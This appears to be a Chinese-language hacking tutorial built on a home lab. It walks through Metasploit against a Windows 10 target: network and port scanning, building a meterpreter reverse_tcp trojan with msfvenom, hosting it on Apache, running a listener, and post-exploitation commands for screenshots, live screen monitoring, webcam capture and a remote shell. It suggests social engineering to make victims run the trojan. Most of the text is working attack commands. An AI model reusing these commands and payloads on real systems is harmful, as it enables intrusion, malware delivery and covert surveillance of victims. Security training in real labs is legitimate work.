一、实验环境:
靶?机:?windows10台式机(可以自己搭一个虚拟机,我这里用物理机做靶机):
192.168.1.114
攻击机:?kali虚拟机:192.168.1.116
二、msf工具基本用法:
msfconsole?? ??#进入msf框架
search? 相关漏洞(如search ms17_010)? ? ??# 使用search命令查找相关漏洞
use exploit/windows/smb/ms17_010_eternalblue ? ? ?# 使用use进入漏洞相关模块
info? ? ? #使用info查看模块信息
set payload windows/x64/meterpreter/reverse_tcp ? ???#设置攻击载荷
show options? ? ??#查看模块需要配置的参数
set ?RHOST ?192.168.1.114? ? ? #设置Remote的IP
exploit、run? ? ? ??#两个命令都可以进行攻击
下面开始进入实战:
1.?主机发现(扫描局域网所有存活机器):
netdiscover -i eth0 -r 192.168.10.0/24
目前局域网有4台设备在线,192.168.1.114就是我们要攻击的靶机。
?2.?端口扫描(扫描该靶机开放的端口):
masscan --rate=10000 -p0-65535 192.168.1.114
3.?扫描各端口所属服务:
nmap -sV -T4?192.168.1.114
nmap -sV -T4 -O -p 135,139,445?192.168.1.114(可特定某些端口)
4.?msf生成木马:
msfvenom -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.1.116?lport=8888?-f exe -o /var/www/html/ltw.exe
lhost:kali的IP地址
lport:设置监听的端口,可以随意设置,只要不被占用,靶机点击木马后kali通过8888端口进行监听。
/var/www/html/ltw.exe:我这边把木马放到Apache服务器上,所以kali要安装Apache。
安装方法:apt-get install httpd(可能会报错),如果报错改为:apt-get install apache2。然后通过service apache2 start 启动Apache
?Apache已经成功启动。
?5.?如何让靶机运行你生成的木马:
可通过社工、漏洞利用等方式让用户进行点击,这边不做详解。
6.?配置监听:
msfconsole打开msf
开启后门监听
命令:use exploit/multi/handler?
查看有哪些可利用的payloads
命令:show payloads
set payload windows/meterpreter/reverse_tcp???? #设置攻击载荷
show options? ?#设置要配置哪些信息
set lhost 192.168.1.116? ? ?
set lport 8888
exploit
我们开启了一个
reverse TCP监听器来监听本地的8888端口,即我(攻击者)的Kali主机地址(LHOST)和端口号(LPORT)
输出metetpreter这个后渗透模块,攻击成功,现在可以对靶机进行控制。
7.?进行后渗透:?
screenshot:截图
run vnc -i:监控靶机屏幕
webcam_snap 靶机摄像头拍照
输入:?
shell即可切换到目标主机的windows cmd_shell里面:shell ? ? ? ? #获取目标主机的cmd_shell权限
chcp 65001 ? ?#这里为了避免目标主机cmd_shell字符乱码,设置目标主机命令行的字符编码,65001是UTF-8
exit? ? ? ? ? ? ? ? ?#退回到meterpreter
background? ? #把我们获得的meterpreter会话挂载到后台运行
sessions -l? ? ? #查看获得的meterpreter_shell会话列表
session 1? ? ? ? #重新进入meterpreter
?
